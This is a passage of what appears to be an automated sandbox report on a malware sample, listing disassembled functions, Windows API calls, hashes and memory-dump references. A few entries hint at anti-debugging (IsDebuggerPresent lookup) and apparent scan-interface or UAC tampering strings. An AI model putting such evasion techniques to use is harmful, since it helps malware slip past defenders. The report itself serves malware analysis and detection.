                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: __aulldiv
                                                                      • String ID: LfF$xdF$NG
                                                                      • API String ID: 3732870572-2534066922
                                                                      • Opcode ID: 2a6cbd74b7f1d7262aabe967babe0c7563b8d160d0352d0a7d413315700012c3
                                                                      • Instruction ID: 16ecbfc8607127159e6c55fb4bbfda8fc63b8f3a6b016a0ea7c785ecaa0037b1
                                                                      • Opcode Fuzzy Hash: 2a6cbd74b7f1d7262aabe967babe0c7563b8d160d0352d0a7d413315700012c3
                                                                      • Instruction Fuzzy Hash: 65B19171608350AFC214EB24D861AAEB7EAEFE4314F40491EF48A52790EF359D49CF67
                                                                      Function 02D6D1EB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: __dosmaperr
                                                                      • String ID: H
                                                                      • API String ID: 2332233096-2852464175
                                                                      • Opcode ID: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                                      • Instruction ID: e74721125b90de7d41128cd93e4af127028ba4d7092fe7f242402f6ffff06459
                                                                      • Opcode Fuzzy Hash: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                                      • Instruction Fuzzy Hash: E1A14732A101149FDF19EF68EC98BBD7BA2EB0A324F14015DE851AB3D1DB318C12CB61
                                                                      Function 02D62259 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 216COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: __freea
                                                                      • String ID: PkGNG
                                                                      • API String ID: 240046367-263838557
                                                                      • Opcode ID: 063005e08074a30aa5a7525b1a3cdd37634a4b88fb4996d08a0078e91088f893
                                                                      • Instruction ID: 9574f3f4de23991a2caf9edc309d2cb888347c84bc756d231743c28482fca384
                                                                      • Opcode Fuzzy Hash: 063005e08074a30aa5a7525b1a3cdd37634a4b88fb4996d08a0078e91088f893
                                                                      • Instruction Fuzzy Hash: F251BF72610216ABDB258F64CC8CEBF77AAEF54754F194629FD04D6290EB34EC40CAA0
                                                                      Function 02D1FDD7 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 186COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 02D1FDDC
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 02D1FEBD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Exception@8H_prologThrow
                                                                      • String ID: xdF$y~E
                                                                      • API String ID: 3222999186-3309775686
                                                                      • Opcode ID: 3108295a3ea490f6f4279643bcf91a98a4e8460a72a47f708dfbc03d5f7be2ca
                                                                      • Instruction ID: 6d3f2e8c6216aaf41150814a0bba5b7753cea6232c9e0c49d96bf82746ebeac9
                                                                      • Opcode Fuzzy Hash: 3108295a3ea490f6f4279643bcf91a98a4e8460a72a47f708dfbc03d5f7be2ca
                                                                      • Instruction Fuzzy Hash: DE517172900219BBCB04FB74ED669ED777AEF54304F500169A806A7A90EF349F49CFA1
                                                                      Function 02D65CF9 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free_strpbrk
                                                                      • String ID: *?$.
                                                                      • API String ID: 3300345361-3972193922
                                                                      • Opcode ID: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                                      • Instruction ID: 1aaa63bf95f0e0fa0edaff782d1093a142c333de1c35ba6ad599e70b94f9cd2c
                                                                      • Opcode Fuzzy Hash: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                                      • Instruction Fuzzy Hash: 96515975E0021AABDF24CFA8D884ABDBBB5EF48314F24816AD854E7340E7759E41CF60
                                                                      Function 02C9AB00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetThreadLocale.KERNEL32(?,00000000,02C9ACD0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02C9AB2F
                                                                        • Part of subcall function 02C9A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02C9A7E2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Locale$InfoThread
                                                                      • String ID: eeee$ggg$yyyy
                                                                      • API String ID: 4232894706-1253427255
                                                                      • Opcode ID: 1a2b5930bda1db596a761a6144c61a40420cf3817a05bf36a21038f9f33806e6
                                                                      • Instruction ID: 24772336138fb5b5fd296aa879d6d6898b73c82ccf027480ef0302590df16e9c
                                                                      • Opcode Fuzzy Hash: 1a2b5930bda1db596a761a6144c61a40420cf3817a05bf36a21038f9f33806e6
                                                                      • Instruction Fuzzy Hash: B3411AB17049084BDF25EB79889C7BEB3EBDFC6304B504525D442CB344DA36EE02EA65
                                                                      Function 02CA81CC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02CA823C,?,?,00000000,?,02CA7A7E,ntdll,00000000,00000000,02CA7AC3,?,?,00000000), ref: 02CA820A
                                                                        • Part of subcall function 02CA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CA82FC,?,?,00000000,00000000,?,02CA8215,00000000,KernelBASE,00000000,00000000,02CA823C), ref: 02CA82C1
                                                                        • Part of subcall function 02CA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CA82C7
                                                                        • Part of subcall function 02CA8274: GetProcAddress.KERNEL32(?,?), ref: 02CA82D9
                                                                      • GetModuleHandleA.KERNELBASE(?), ref: 02CA821E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: HandleModule$AddressProc
                                                                      • String ID: AeldnaHeludoMteG$KernelBASE
                                                                      • API String ID: 1883125708-1952140341
                                                                      • Opcode ID: 5c73fcf250898e2559682889ee4c8ff94d12e23d38c7d34090319b04bef3d431
                                                                      • Instruction ID: d08b33c2d246595f71a0d7498c9b54864cce8e7f01ac5f4d9e4138bfa6557e4e
                                                                      • Opcode Fuzzy Hash: 5c73fcf250898e2559682889ee4c8ff94d12e23d38c7d34090319b04bef3d431
                                                                      • Instruction Fuzzy Hash: 78F06271A84704BFEB14EBA4DC25969B7EEF74A7047514660B80083B10D730AE11A924
                                                                      Function 02D4C8C8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 29COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 02D4C8D4
                                                                        • Part of subcall function 02D4C83D: std::exception::exception.LIBCONCRT ref: 02D4C84A
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 02D4C8E2
                                                                        • Part of subcall function 02D4D195: ___crtInitializeCriticalSectionEx.LIBCPMT ref: 02D4D1A2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CriticalException@8InitializeSectionThrow___crtstd::exception::exceptionstd::invalid_argument::invalid_argument
                                                                      • String ID: !G$` G
                                                                      • API String ID: 64778976-1850324976
                                                                      • Opcode ID: a5f87e4ec28c6f1509e93140d5bb26fd2096d98fbde0f457b3520502c9e02379
                                                                      • Instruction ID: e3b5112bdb55553f09b40dae7e179fd3f04da13ed0f9a1c6618b3cff10b3eae0
                                                                      • Opcode Fuzzy Hash: a5f87e4ec28c6f1509e93140d5bb26fd2096d98fbde0f457b3520502c9e02379
                                                                      • Instruction Fuzzy Hash: 65E0D836D21118379B00B6BCAD049C9739EDE44350B404077EE15E3250FFA88E41C9E8
                                                                      Function 02CAF6E8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(KernelBase,?,02CAFAEB,UacInitialize,02D17380,02CBB7B8,OpenSession,02D17380,02CBB7B8,ScanBuffer,02D17380,02CBB7B8,ScanString,02D17380,02CBB7B8,Initialize), ref: 02CAF6EE
                                                                      • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02CAF700
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressHandleModuleProc
                                                                      • String ID: IsDebuggerPresent$KernelBase
                                                                      • API String ID: 1646373207-2367923768
                                                                      • Opcode ID: b0f35f11b6f75546f52069da6543398397bcada098f51279e865fba3393f0d62
                                                                      • Instruction ID: 77777a7e31d2c11baf540e3ba0b64b6cf3832aa499837b6aeaaf58159d7ad8aa
                                                                      • Opcode Fuzzy Hash: b0f35f11b6f75546f52069da6543398397bcada098f51279e865fba3393f0d62
                                                                      • Instruction Fuzzy Hash: 17D012B235035119BE0072F41CD8819038C865452D3300F74B023C65E2E5B788556118
                                                                      Function 02C9C474 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,?,02CBD10B,00000000,02CBD11E), ref: 02C9C47A
                                                                      • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02C9C48B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressHandleModuleProc
                                                                      • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                      • API String ID: 1646373207-3712701948
                                                                      • Opcode ID: 06b62a268a7e6eab7f0553b37d83a41e055e01a442ae45006835b73066e56b4d
                                                                      • Instruction ID: 89834d92de113335afbe32f1aac8c7c34b3dc6a3a2a7e7fa7dfad9cb04fbb83f
                                                                      • Opcode Fuzzy Hash: 06b62a268a7e6eab7f0553b37d83a41e055e01a442ae45006835b73066e56b4d
                                                                      • Instruction Fuzzy Hash: A7D05EF0B807045AEF01AAB9548C735339C8B5DB10F504926E40165102E77B56108F14
                                                                      Function 02D607A0 Relevance: 6.4, APIs: 4, Instructions: 370COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free
                                                                      • String ID:
                                                                      • API String ID: 269201875-0
                                                                      • Opcode ID: 99b9f95825b3d3947f98974b62c5657870841952fc290d3d865075dfb712b2e8
                                                                      • Instruction ID: 717b2cbaf6f2dc3750302d882c446b79a4434f9993149f7b2e6d0df5970cf32d
                                                                      • Opcode Fuzzy Hash: 99b9f95825b3d3947f98974b62c5657870841952fc290d3d865075dfb712b2e8
                                                                      • Instruction Fuzzy Hash: C5C11A71904205AFDB24EF788D58BBE7BBAFF45352F1841AAD88497350E7718E41CBA0
                                                                      Function 02D61614 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: __alldvrm$_strrchr
                                                                      • String ID:
                                                                      • API String ID: 1036877536-0
                                                                      • Opcode ID: 741cce58a8cf82a0672f857150eda12be5e673117a3cfe047addc8b2d3899a0b
                                                                      • Instruction ID: c2e0e01cd246e0b09c947bb6f723b48c7c84d5421977e30850944c8b615049e1
                                                                      • Opcode Fuzzy Hash: 741cce58a8cf82a0672f857150eda12be5e673117a3cfe047addc8b2d3899a0b
                                                                      • Instruction Fuzzy Hash: 8FA12576A00386AFEB21CF68C885BBEBBE5EF15354F1841A9D5899B381D734CD41CB60
                                                                      Function 02D64390 Relevance: 6.3, APIs: 4, Instructions: 300COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 41332500f0008602d77d1c660e50033fd15bda36b9a02a1f3ccc300d02d52732
                                                                      • Instruction ID: f49e7b819d4b48487f94b6c05bcce30762c2e50222561d9562c74a7daf163a0b
                                                                      • Opcode Fuzzy Hash: 41332500f0008602d77d1c660e50033fd15bda36b9a02a1f3ccc300d02d52732
                                                                      • Instruction Fuzzy Hash: 0EC1BE70A04299AFDF21DFA8C848BBDBBB5AF0A310F144199E964A7391C7B49D41CF71
                                                                      Function 02C9E1E8 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02C9E297
                                                                      • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02C9E2B3
                                                                      • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02C9E32A
                                                                      • VariantClear.OLEAUT32(?), ref: 02C9E353
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                      • String ID:
                                                                      • API String ID: 920484758-0
                                                                      • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                      • Instruction ID: bdb5388193019893b4d6b3e144863c50dc9e81c1b823f7f798c0ea09203ad098
                                                                      • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                      • Instruction Fuzzy Hash: A7412975A016299FCF62DB58CC98BC9B3BDAF59304F0041D6E64DA7211DA30AF809F50
                                                                      Function 02C9AD3C Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02C9AD59
                                                                      • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02C9AD7D
                                                                      • GetModuleFileNameA.KERNEL32(02C90000,?,00000105), ref: 02C9AD98
                                                                      • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02C9AE2E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileModuleName$LoadQueryStringVirtual
                                                                      • String ID:
                                                                      • API String ID: 3990497365-0
                                                                      • Opcode ID: 5b971bf9844bf9b1260027d20def6fad9c6452a10c2d5676243eb4bb50189ddc
                                                                      • Instruction ID: 87657fffafae28f51d4c1451343222078d3ef21ff7eec86ac70c2e93012676f2
                                                                      • Opcode Fuzzy Hash: 5b971bf9844bf9b1260027d20def6fad9c6452a10c2d5676243eb4bb50189ddc
                                                                      • Instruction Fuzzy Hash: 1E413B71A402589BDF21DB68CC88BDAB7FDAB48300F4441E6E548E7241DB749F84DF90
                                                                      Function 02C9AD3A Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02C9AD59
                                                                      • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02C9AD7D
                                                                      • GetModuleFileNameA.KERNEL32(02C90000,?,00000105), ref: 02C9AD98
                                                                      • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02C9AE2E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
